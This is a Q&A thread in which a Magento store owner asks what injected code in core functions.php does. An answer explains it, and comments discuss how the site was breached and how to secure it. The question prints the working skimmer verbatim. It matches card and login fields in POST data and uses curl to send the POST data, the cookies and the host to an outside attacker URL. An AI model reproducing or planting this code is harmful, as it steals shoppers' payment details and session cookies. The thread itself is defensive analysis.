# Server side scanner detected "php.malware.magento-cc-stealer.069"

Tags: php, magento, magento-1.9, malware

I have a server side scanner that scan my site for any traces of malicious code. I came in this morning to see that it reported **php.malware.magento-cc-stealer.069** in my `app/code/core/Mage/Core/functions.php` file.

I run a online store using Magento version 1.9.3.

I went through this file and compared it against the mirror copy of clean Magento 1.9.3 `function.php` file.

I found that to be added to my file:

```
if (preg_match("/".base64_decode('YmlsbGluZ3xmaXJzdG5hbWV8Y2NfbnVtYmVyfGxvZ2lufHVzZXJuYW1lfHBheW1lbnR8Y2Nf')."/i", serialize($_POST)))
    exec("curl --data \"version=1&encode=".base64_encode(   serialize($_POST) . "--" . serialize($_COOKIE) )."&host=".$_SERVER["HTTP_HOST"]."\" ".base64_decode('aHR0cHM6Ly9tYWdlc2NyaXB0cy5pbmZvL3Rlc3RTZXJ2ZXIucGhw')." > /dev/null 2<&1 &");
```

Any could explain what this does and what consequences it has?

As far as I understand, the first line of this if statement says that if the data matches the encoded text (*billing|firstname|cc_number|login|username|payment|cc_*) and is case sensitive, generate a storable representation of a value and post it. I'm struggling with the second line though.

Answer (score 2, accepted):

As the name suggests, it is trying to steal credit card information.

It will trigger any time these credit card fields appear in the POST request and it will just send them together with cookie info and your server address via curl to `https://magescripts.info/testServer.php` (DON'T CLICK!) which is presumably another victim, hosting the attacker's collection script. Note: if magescripts.info is your domain, your search is not over, you should find where testServer.php points and remove that also.

Comment: I have removed that if statement now, also, the domain is not mine. Is this a common malware script? What steps should I take now? If that's another victim, should I notify him somehow?

Comment: i don't know how common it is, but it seems very primitive. You should definitely try to find how it got there. Maybe somebody's ftp credentials are compromised - windows viruses routinely scan for Filezilla or totalcommander ftp config file looking for saved passwords. And Filezilla implemented encrypted passwords only like a year ago. Another thing might be a vulnerability in magento itself, or some other app running on the server exposed to internet. So update to latest versions

Comment: I have to use VPN to be able to connect to the FTP or SSH, could that be compromised too? Thank you anyway! I mark this answer as accepted.

Comment: depends if the VPN server is the same machine as the web server. I would assume it isn't. Basically general practice applies here - use strong passwords, don't save them in plaintext, for ssh use password protected private keys (yes, it's annoying).. but of course get rid of the virus that stole the pass/key in the first place, because no amount of cryptography can save you from a simple keylogger..

Comment: You are right, it's hosted somewhere else. I will scan every computer and try to find the gap in the system. Thank you for your interest!